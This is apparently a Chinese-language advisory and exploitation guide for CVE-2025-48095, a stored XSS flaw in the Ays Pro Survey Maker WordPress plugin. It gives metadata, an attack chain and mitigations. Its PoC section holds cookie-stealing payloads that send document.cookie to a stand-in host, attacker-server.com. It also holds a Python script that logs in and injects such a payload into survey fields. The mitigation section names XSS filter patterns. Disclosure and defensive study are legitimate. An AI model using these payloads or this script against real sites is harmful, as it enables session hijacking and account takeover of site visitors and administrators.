CVE-2025-48095：Survey Maker插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-48095

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Ays Pro Survey Maker（WordPress插件）

漏洞概述

CVE-2025-48095是Ays Pro Survey Maker WordPress插件中存在的一个存储型跨站脚本（Stored XSS）漏洞，由Patchstack安全团队的研究员[email protected]发现并报告。该漏洞源于插件在网页生成过程中对用户输入未能进行充分的过滤与转义处理（Improper Neutralization of Input During Web Page Generation），导致恶意脚本可以被持久化存储到服务器端，并在其他用户访问相关页面时被自动执行。Survey Maker是一款广受欢迎的WordPress问卷调查插件，允许网站管理员创建各种类型的调查问卷和表单。由于该插件涉及大量用户输入字段（如问卷标题、问题描述、选项内容等），一旦存在XSS漏洞，攻击者便可通过精心构造的恶意载荷窃取管理员会话Cookie、篡改页面内容、实施钓鱼攻击，甚至在特定条件下获取网站控制权。该漏洞的CVSS 3.1评分为5.9分，属于中危级别，虽然需要高权限（PR:H）才能触发，但攻击向量为网络（AV:N），且需要用户交互（UI:R），影响范围涵盖机密性、完整性和可用性三个方面。漏洞影响版本为从n/a到5.1.8.8的所有版本，建议使用该插件的网站管理员尽快升级到安全版本以消除风险。

技术细节

该漏洞的技术原理在于Survey Maker插件在处理用户提交的数据时，未能对输入内容进行适当的HTML实体编码或过滤，导致存储型XSS攻击成为可能。具体而言，当具有高权限的用户（如管理员、编辑或具有相应插件权限的角色）在创建或编辑调查问卷时，可以在问卷的标题、描述、问题文本、选项标签等字段中注入恶意的JavaScript代码或HTML标签。由于这些输入数据被存储到数据库中而未经过严格的XSS过滤，当其他用户（包括普通访客和管理员）访问包含该问卷的页面时，恶意脚本将在受害者浏览器上下文中执行。

利用方式方面，攻击者首先需要获取具有插件编辑权限的账户（可能通过社会工程、弱口令爆破或权限提升等方式获得），然后在问卷编辑界面中构造包含XSS载荷的输入。典型的攻击载荷如：<script>alert(document.cookie)</script> 或 <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>。当受害者访问受感染的问卷页面时，浏览器会解析并执行这些恶意脚本，攻击者便可窃取会话凭证、进行权限提升或执行其他恶意操作。由于是存储型XSS，恶意代码会持续影响所有访问相关页面的用户，具有较高的危害性和持久性。

攻击链分析

STEP 1

步骤1：获取初始访问权限

攻击者通过社会工程、暴力破解、钓鱼或购买凭证等方式，获取WordPress网站中具有Survey Maker插件编辑权限的账户（如管理员、编辑或具有相应自定义角色的用户）。

STEP 2

步骤2：构造恶意XSS载荷

攻击者精心构造包含恶意JavaScript代码的载荷，常见形式包括窃取Cookie的脚本、伪造登录页面的iframe、键盘记录器或重定向到恶意站点的代码。

STEP 3

步骤3：注入恶意载荷

攻击者登录WordPress后台，进入Survey Maker插件的问卷创建或编辑界面，将恶意载荷注入到问卷的标题、描述、问题文本或选项等可输入字段中，并保存问卷。

STEP 4

步骤4：载荷持久化存储

由于插件未对输入进行充分的过滤和转义处理，恶意载荷被原样存储到数据库中，形成存储型XSS。

STEP 5

步骤5：触发恶意脚本执行

当其他用户（包括普通访客、管理员或其他高权限用户）访问包含该恶意问卷的页面时，浏览器会自动解析并执行存储的恶意脚本。

STEP 6

步骤6：实施进一步攻击

恶意脚本在受害者浏览器上下文中执行后，攻击者可窃取会话Cookie实施账户劫持、进行钓鱼攻击、篡改页面内容、在特定条件下利用管理员权限上传Webshell或执行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-48095: Survey Maker Plugin <= 5.1.8.8 -->
<!-- Attack Vector: Inject malicious script into survey fields (title, description, question text, options) -->
<!-- Requires: High privilege user (PR:H) such as admin or editor -->

<!-- Step 1: Login as admin/editor with Survey Maker edit permissions -->
<!-- Step 2: Navigate to Survey Maker > Add New Survey -->
<!-- Step 3: Inject the following payloads into vulnerable input fields -->

<!-- Payload 1: Basic cookie stealing via script tag -->
<script>document.location='https://attacker-server.com/steal?cookie='+document.cookie</script>

<!-- Payload 2: Cookie stealing via img onerror (bypasses some filters) -->
<img src=x onerror="fetch('https://attacker-server.com/steal?c='+document.cookie)">

<!-- Payload 3: Using SVG with onload event -->
<svg/onload=alert(document.domain)>

<!-- Payload 4: Using input autofocus with onfocus -->
<input onfocus=alert('XSS') autofocus>

<!-- Step 4: Save the survey -->
<!-- Step 5: When any victim (including unauthenticated visitors) views the survey page, the malicious script executes in their browser context -->

<!-- Python exploit example for automated testing -->
import requests

TARGET_URL = "https://target-wordpress-site.com"
USERNAME = "contributor_account"
PASSWORD = "password123"
ATTACKER_WEBHOOK = "https://attacker-server.com/steal"

session = requests.Session()

# Login to WordPress
login_data = {
    'log': USERNAME,
    'pwd': PASSWORD,
    'wp-submit': 'Log In',
    'redirect_to': f'{TARGET_URL}/wp-admin/',
    'testcookie': '1'
}
session.post(f'{TARGET_URL}/wp-login.php', data=login_data)

# XSS payload to inject into survey title or description field
xss_payload = f'<script>document.location="{ATTACKER_WEBHOOK}?c="+document.cookie</script>'

# Create or edit survey with injected payload (endpoint may vary)
survey_data = {
    'title': xss_payload,
    'description': xss_payload,
    'survey_status': 'published',
    # Additional fields as required by the plugin
}

# Submit to survey creation endpoint
response = session.post(
    f'{TARGET_URL}/wp-admin/admin.php?page=survey-maker&action=add_survey',
    data=survey_data
)

print(f"Survey created with XSS payload. Status: {response.status_code}")
print(f"Payload stored. Victims visiting the survey will execute: {xss_payload}")

影响范围

Ays Pro Survey Maker <= 5.1.8.8

防御指南

临时缓解措施

在等待官方安全补丁发布或完成升级前，建议采取以下临时缓解措施：1）限制对Survey Maker插件管理页面的访问权限，仅允许受信任的管理员账户访问；2）通过Web应用防火墙（WAF）或.htaccess规则部署临时的XSS过滤规则，阻止包含<script>、onerror=、onload=等常见XSS特征的请求；3）在Web服务器层面添加Content-Security-Policy（CSP）响应头，限制内联脚本的执行；4）定期检查已发布的问卷内容，删除可疑的脚本注入；5）监控网站访问日志，识别异常的脚本执行行为；6）为所有管理员账户强制启用双因素认证，降低凭证被盗用的风险；7）考虑暂时停用Survey Maker插件，使用其他安全的问卷替代方案。